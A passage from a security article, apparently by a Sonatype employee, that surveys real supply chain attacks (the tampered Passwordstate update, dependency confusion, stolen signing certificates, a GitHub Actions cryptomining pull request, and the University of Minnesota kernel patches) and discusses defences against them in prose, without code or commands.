The illicit update contained a modified DLL file titled, Moserware.SecretSplitter.dll, a small part of which is shown below:
In a security advisory, Click Studios stated:
“The compromise existed for approximately 28 hours before it was closed down. Only customers that performed In-Place Upgrades between the times stated above are believed to be affected. Manual Upgrades of Passwordstate are not compromised. Affected customers password records may have been harvested.”
In addition to having a technical aspect to it (i.e., the upgrade process being tampered with), this supply chain attack had a social engineering aspect as well. In the counterfeit update zip file, which is over 300 MB in size, I discovered the attackers had managed to alter the user manuals, help files, and PowerShell build scripts to point to their malicious content distribution network (CDN) server:
The social engineering aspect to this attack also demonstrates another weakness: that humans (especially newer developers or software consumers) may not always suspect links to content distribution networks (CDNs), whether these are suspicious or not. This is because CDNs are legitimately used by software applications and websites to deliver updates, scripts, and other content.
3. Dependency confusion attacks
In 2021, no piece on supply chain attacks can be complete without mentioning dependency confusion, especially because of the simplistic and automated nature of this attack. Dependency confusion attacks work with minimal effort on the attacker’s end and in an automated fashion due to an inherent design weakness found in multiple open-source ecosystems.
Put simply, dependency confusion (or namespace confusion) works if your software build uses a private, internally created dependency that does not exist on a public open-source repository. An attacker is able to register a dependency by the same name on a public repository, with a higher version number. Then, very likely, the attacker’s (public) dependency with the higher version number will be pulled into your software build, as opposed to your internal dependency.
By exploiting this simple weakness across commonly used ecosystems including PyPI, npm and RubyGems, ethical hacker Alex Birsan was able to hack into 35 big tech firms and walk away with over $130,000 in bug bounty rewards.
Days following Birsan’s research disclosure, thousands of dependency confusion copycat packages began flooding PyPI, npm and other ecosystems. Although most of these copycats were created by other aspiring bug bounty hunters, some went a step too far by targeting known companies in a malicious manner.
There are multiple ways to resolve dependency confusion, including registering (reserving) the names of all your private dependencies on public repositories before an attacker does and using automated solutions–such as a software development lifecycle (SDLC) firewall that prevents conflicting dependency names from entering your supply chain.
Owners of open-source repositories can adopt a more stringent verification process and enforce namespacing/scoping in place. For example, to post packages under the “CSO” namespace or scope, an open-source repository could verify if the developer uploading a package has rights to do so under the name “CSO.”
Java component repository Maven Central employs a simple domain-based verification to verify namespace ownership–a practice that can easily be modeled by other ecosystems. [Full disclosure: Maven Central is maintained by my employer, Sonatype].
Similarly, packages published to the Go package repository are named after the URL to their GitHub repository, making dependency confusion attacks much more challenging, if not outright impossible.
4. Stolen SSL and code-signing certificates
With an increase in HTTPS websites, SSL/TLS certificates are now ubiquitously present and protect your online communications. A compromise of an SSL certificate’s private key could therefore threaten the secure communication and assurance offered by an end-to-end encrypted connection to the end-users.
In January 2021, Mimecast disclosed a certificate used by its customers to establish connection to Microsoft 365 Exchange services had been compromised, potentially impacting communications of about 10% of Mimecast users. While Mimecast did not explicitly confirm whether this was an SSL certificate, this largely appears to be the case, as suspected by some researchers.
While a compromised SSL certificate is problematic, a stolen code-signing certificate (i.e., a compromised private key) can have far wider consequences for software security. Attackers who get their hands on the private code-signing key can potentially sign their malware as an authentic software program or update being shipped by a reputable company.
Although Stuxnet remains a significant example of a sophisticated attack in which attackers used stolen private keys from two prominent companies to sign their malicious code as “trusted,” such attacks have flourished before Stuxnet and continue to even years later. This is also why the aforementioned example of HashiCorp’s GPG private key exposure in the Codecov supply chain attack is problematic. Although there is no indication yet that HashiCorp’s compromised key was abused by attackers to sign malware, such an incident was a real possibility until the compromised key was revoked.
5. Targeting developers’ CI/CD infrastructure
Sonatype recently observed a multi-faceted software supply chain attack that not only relied on the introduction of malicious pull requests to a user’s GitHub project, but also abused GitHub’s CI/CD automation infrastructure, GitHub Actions, to mine cryptocurrency. GitHub Actions provides developers with a way to schedule automated CI/CD tasks for repositories hosted on GitHub.
The attack consisted of attackers cloning legitimate GitHub repositories that used GitHub Actions, slightly altering the GitHub Action script in the repository, and filing a pull request for the project owner to merge this change back into the original repository.
Should a project owner casually approve the altered pull request, a supply chain attack has succeeded, but that wasn’t even the prerequisite here. The malicious pull request contained modifications to ci.yml, which were automatically run by GitHub Actions as soon as the pull request was filed by the attacker. The modified code essentially abuses GitHub’s servers to mine cryptocurrency.
Such an attack kills two birds with one stone: It tricks a developer into accepting a malicious pull request, and should that fail, it abuses the automated CI/CD infrastructure in place for conducting malicious activities.
Likewise, researchers who successfully breached United Nations (UN) domains and accessed over 100,000 UNEP staff record could do so mainly because they had found exposed Git folders and “git-credentials” files on these domains. A threat actor who obtains access to Git credentials can not only clone private Git repositories, but potentially introduce malicious code upstream to trigger a supply chain attack which would have much harsher consequences.
The primary focus of those looking to prevent supply chain attacks has been on recommending secure coding practices to developers or using DevSecOps automation tools in development environments. However, securing CI/CD pipelines (e.g., Jenkins servers), cloud-native containers, and supplementary developer tooling and infrastructure has now become just as important.
6. Using social engineering to drop malicious code
As any security professional knows, security is only as strong as its weakest link. Because the human element remains the weakest link, exploitation may come from places where it is least expected. The Linux Foundation recently banned University of Minnesota researchers who were suggesting intentionally buggy “patches” that in turn introduced vulnerabilities in the Linux kernel source code.
Although the instance was caught and has now been dealt with, it demonstrates a few simple facts: Developers are spread thin and may not always have the bandwidth to vet every single code commit or a proposed code change that may be buggy or outright malicious. More importantly, social engineering may come from least suspected sources–in this case seemingly credible university researchers with an “.edu” email address.
Another recent example includes how any collaborator contributing to a GitHub project can alter a release even after it is published. Here again, the expectation of a project owner is that most contributors are submitting code and commits to their project in good faith. It takes just one collaborator to go rogue and compromise the security of the supply chain for many.
Over the last year, attackers creating typosquatting and brandjacking software packages have repeatedly targeted open-source developers to introduce malicious code in their upstream builds which then propagates to many consumers.
All these real-world examples demonstrate different weaknesses, attack vectors, and techniques that threat actors employ in successful supply chain attacks. As these attacks continue to evolve and pose challenges, more innovative solutions and strategies are needed when approaching software security.